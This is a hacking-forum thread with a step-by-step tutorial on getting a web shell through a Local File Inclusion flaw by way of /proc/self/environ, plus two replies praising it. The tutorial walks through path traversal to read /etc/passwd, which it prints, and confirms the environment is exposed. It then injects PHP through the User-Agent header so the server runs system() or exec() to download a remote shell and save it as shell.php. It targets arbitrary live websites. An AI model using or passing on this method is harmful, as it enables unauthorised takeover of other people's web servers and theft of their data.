Results 1 to 3 of 3
  1. #1

    Talking shell via LFI - proc/self/environ method

    >>>>>>>>>>>>>>> Shell via LFI - proc/self/environ method <<<<<<<<<<<<<<< >>>>>>>>>>>>>>> Author : SirGod <<<<<<<<<<<<<<< >>>>>>>>>>>>>>> <<<<<<<<<<<<<<< >>>>>>>>>>>>>>> <<<<<<<<<<<<<<< >>>>>>>>>>>>>>> <<<<<<<<<<<<<<< 1 - Introduction 2 - Finding LFI 3 - Checking if proc/self/environ is accessible 4 - Injecting malicious code 5 - Access our shell 6 - Shoutz >> 1 - Introduction In this tutorial I show you how to get a shell on websites using Local File Inclusion vulnerabilities and injection malicious code in proc/self/environ.Is a step by step tutorial. >> 2 - Finding LFI - Now we are going to find a Local File Inclusion vulnerable website.So we found our target,lets check it. - Now lets replace contact.php with ../ so the URL will become and we got an error Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/ on line 1337 big chances to have a Local File Inclusion vulnerability.Let's go to next step. - Now lets check for etc/passwd to see the if is Local File Inclusion vulnerable.Lets make a request : we got error and no etc/passwd file Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/ on line 1337 so we go more directories up we succesfully included the etc/passwd file. root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0perator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin test:x:13:30:test:/var/test:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin >> 3 - Checking if proc/self/environ is accessible - Now lets see if proc/self/environ is accessible.We replace etc/passwd with proc/self/environ If you get something like DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2a d7ac HTTP_REFERER= HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fpr oc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc% 2Fself%2Fenviron SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE= Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/ Server at Port 80 proc/self/environ is accessible.If you got a blank page,an error proc/self/environ is not accessible or the OS is FreeBSD. >> 4 - Injecting malicious code - Now let's inject our malicious code in proc/self/environ.How we can do that?We can inject our code in User-Agent HTTP Header. Use Tamper Data Addon for Firefox to change the User-Agent.Start Tamper Data in Firefox and request the URL : Choose Tamper and in User-Agent filed write the following code : -O shell.php');?> Then submit the request. Our command will be executed (will download the txt shell from and will save it as shell.php in the website directory) through system(), and our shell will be created.If don't work,try exec() because system() can be disabled on the webserver from php.ini. >> 5 - Access our shell - Now lets check if our malicous code was successfully injected.Lets check if the shell is present. Our shell is there.Injection was succesfully. >> 6 - Shoutz Shoutz to all members of and

  2. #2
    Thanks for this awesome tutorial <3

  3. #3
    Very Easy N Good Explained

Members who have read this thread: 2

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts